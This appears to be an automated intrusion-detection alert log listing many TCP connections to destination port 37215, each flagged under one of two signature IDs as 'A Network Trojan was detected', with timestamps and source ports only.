            Timestamp:05/28/24-09:56:59.827428
            SID:2835222
            Source Port:60496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742034
            SID:2835222
            Source Port:48056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640516
            SID:2829579
            Source Port:51884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954624
            SID:2835222
            Source Port:48178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290079
            SID:2829579
            Source Port:56896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052177
            SID:2835222
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825094
            SID:2835222
            Source Port:35662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326610
            SID:2829579
            Source Port:57392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777899
            SID:2835222
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280410
            SID:2835222
            Source Port:34504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879035
            SID:2835222
            Source Port:53284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.440201
            SID:2835222
            Source Port:37482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927307
            SID:2829579
            Source Port:44956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722302
            SID:2835222
            Source Port:57652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941657
            SID:2835222
            Source Port:58596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917004
            SID:2835222
            Source Port:43050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626377
            SID:2835222
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605512
            SID:2835222
            Source Port:38838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806908
            SID:2829579
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765884
            SID:2829579
            Source Port:49034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508189
            SID:2829579
            Source Port:33232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818459
            SID:2835222
            Source Port:35406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046959
            SID:2835222
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516110
            SID:2835222
            Source Port:33984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869552
            SID:2835222
            Source Port:42066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334159
            SID:2829579
            Source Port:49086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715459
            SID:2835222
            Source Port:33886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062883
            SID:2835222
            Source Port:56120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834559
            SID:2835222
            Source Port:42464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.942670
            SID:2829579
            Source Port:53904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028193
            SID:2829579
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634989
            SID:2829579
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871317
            SID:2835222
            Source Port:35726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.998682
            SID:2829579
            Source Port:45796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925325
            SID:2829579
            Source Port:41316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910125
            SID:2835222
            Source Port:56936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841962
            SID:2829579
            Source Port:58464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335921
            SID:2835222
            Source Port:47740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516377
            SID:2835222
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943340
            SID:2835222
            Source Port:52528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701825
            SID:2835222
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842745
            SID:2835222
            Source Port:48764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818225
            SID:2829579
            Source Port:50798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260719
            SID:2829579
            Source Port:49304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806863
            SID:2829579
            Source Port:45942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911191
            SID:2835222
            Source Port:53062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.930025
            SID:2829579
            Source Port:43420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863587
            SID:2829579
            Source Port:41462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508307
            SID:2829579
            Source Port:53154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935216
            SID:2835222
            Source Port:38658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928916
            SID:2829579
            Source Port:37820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.974954
            SID:2835222
            Source Port:60904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780618
            SID:2829579
            Source Port:56920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855248
            SID:2829579
            Source Port:58840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039293
            SID:2829579
            Source Port:55604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811343
            SID:2829579
            Source Port:33070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222009
            SID:2835222
            Source Port:52620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543280
            SID:2829579
            Source Port:53154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039369
            SID:2835222
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864740
            SID:2829579
            Source Port:54076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414294
            SID:2835222
            Source Port:52122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508098
            SID:2835222
            Source Port:34304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.623710
            SID:2829579
            Source Port:44496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058263
            SID:2829579
            Source Port:36732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519729
            SID:2835222
            Source Port:38796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.139078
            SID:2829579
            Source Port:49136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559348
            SID:2829579
            Source Port:47316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733463
            SID:2829579
            Source Port:36858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.545031
            SID:2829579
            Source Port:55074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655255
            SID:2835222
            Source Port:55070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994022
            SID:2829579
            Source Port:54826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927243
            SID:2835222
            Source Port:47970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563291
            SID:2835222
            Source Port:42828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935136
            SID:2835222
            Source Port:51282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741737
            SID:2829579
            Source Port:43880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348961
            SID:2835222
            Source Port:53416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870062
            SID:2829579
            Source Port:53490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783705
            SID:2829579
            Source Port:57902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569217
            SID:2835222
            Source Port:44604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.777728
            SID:2835222
            Source Port:48550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962894
            SID:2829579
            Source Port:50136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290144
            SID:2835222
            Source Port:38280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323334
            SID:2835222
            Source Port:42088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003103
            SID:2835222
            Source Port:37908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855028
            SID:2829579
            Source Port:38346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.281617
            SID:2835222
            Source Port:38524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897889
            SID:2835222
            Source Port:60276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841002
            SID:2829579
            Source Port:38298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707512
            SID:2835222
            Source Port:45336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822232
            SID:2835222
            Source Port:48288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.879800
            SID:2835222
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986336
            SID:2835222
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870669
            SID:2835222
            Source Port:39034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300173
            SID:2829579
            Source Port:53446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854734
            SID:2835222
            Source Port:42790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771229
            SID:2835222
            Source Port:45732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955927
            SID:2829579
            Source Port:56462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957529
            SID:2829579
            Source Port:56604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053989
            SID:2829579
            Source Port:47974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764884
            SID:2829579
            Source Port:59068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.616967
            SID:2829579
            Source Port:46150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710621
            SID:2829579
            Source Port:44140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942093
            SID:2829579
            Source Port:59020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320785
            SID:2829579
            Source Port:33408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433605
            SID:2835222
            Source Port:54802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412855
            SID:2835222
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527680
            SID:2835222
            Source Port:38586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.694308
            SID:2829579
            Source Port:39690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046851
            SID:2835222
            Source Port:51802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952787
            SID:2835222
            Source Port:54884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930683
            SID:2829579
            Source Port:36342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926827
            SID:2835222
            Source Port:57908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.570635
            SID:2835222
            Source Port:59412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488036
            SID:2829579
            Source Port:40106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031388
            SID:2829579
            Source Port:38902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582094
            SID:2829579
            Source Port:45274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776471
            SID:2829579
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277512
            SID:2835222
            Source Port:43912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611428
            SID:2835222
            Source Port:52832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873545
            SID:2829579
            Source Port:49600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745089
            SID:2829579
            Source Port:55444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935116
            SID:2829579
            Source Port:43692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717750
            SID:2829579
            Source Port:33062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326699
            SID:2829579
            Source Port:57730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343199
            SID:2835222
            Source Port:50686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581570
            SID:2829579
            Source Port:39712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824621
            SID:2835222
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892398
            SID:2835222
            Source Port:41380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860751
            SID:2829579
            Source Port:40952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321135
            SID:2835222
            Source Port:47858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782691
            SID:2835222
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052892
            SID:2835222
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.888972
            SID:2829579
            Source Port:51420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748427
            SID:2829579
            Source Port:59212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020629
            SID:2829579
            Source Port:36594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818705
            SID:2829579
            Source Port:46228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046926
            SID:2829579
            Source Port:46282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990574
            SID:2835222
            Source Port:59382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778143
            SID:2835222
            Source Port:42960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065107
            SID:2835222
            Source Port:52334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.408809
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.385507
            SID:2829579
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992558
            SID:2829579
            Source Port:59842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821320
            SID:2835222
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952189
            SID:2835222
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047999
            SID:2835222
            Source Port:42088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773165
            SID:2829579
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014729
            SID:2829579
            Source Port:33688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.525989
            SID:2829579
            Source Port:38056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881976
            SID:2829579
            Source Port:45862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834397
            SID:2829579
            Source Port:48496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869310
            SID:2829579
            Source Port:41404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385513
            SID:2835222
            Source Port:48742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464951
            SID:2829579
            Source Port:36368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821868
            SID:2829579
            Source Port:46314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000896
            SID:2835222
            Source Port:37502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.808874
            SID:2835222
            Source Port:56892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445246
            SID:2829579
            Source Port:36850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952410
            SID:2829579
            Source Port:52330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910169
            SID:2835222
            Source Port:48338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.957493
            SID:2829579
            Source Port:59182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039744
            SID:2829579
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778153
            SID:2829579
            Source Port:59408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617891
            SID:2835222
            Source Port:58720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865430
            SID:2835222
            Source Port:44222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868429
            SID:2835222
            Source Port:54266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377803
            SID:2835222
            Source Port:56944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.471894
            SID:2835222
            Source Port:46194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811112
            SID:2829579
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321596
            SID:2835222
            Source Port:58742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850278
            SID:2829579
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518946
            SID:2829579
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717408
            SID:2829579
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2835222
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525798
            SID:2829579
            Source Port:34256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058082
            SID:2835222
            Source Port:48778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335322
            SID:2829579
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994703
            SID:2829579
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310545
            SID:2835222
            Source Port:38926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782788
            SID:2829579
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.409066
            SID:2835222
            Source Port:55096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854909
            SID:2835222
            Source Port:50338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880519
            SID:2835222
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.758219
            SID:2835222
            Source Port:43162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311078
            SID:2829579
            Source Port:50916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740515
            SID:2835222
            Source Port:53336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995842
            SID:2829579
            Source Port:51572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707748
            SID:2829579
            Source Port:49366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488817
            SID:2829579
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776528
            SID:2835222
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336421
            SID:2835222
            Source Port:44262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930118
            SID:2835222
            Source Port:54748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274931
            SID:2835222
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984830
            SID:2835222
            Source Port:56864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934244
            SID:2835222
            Source Port:40038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935985
            SID:2835222
            Source Port:35326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811903
            SID:2829579
            Source Port:55372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872260
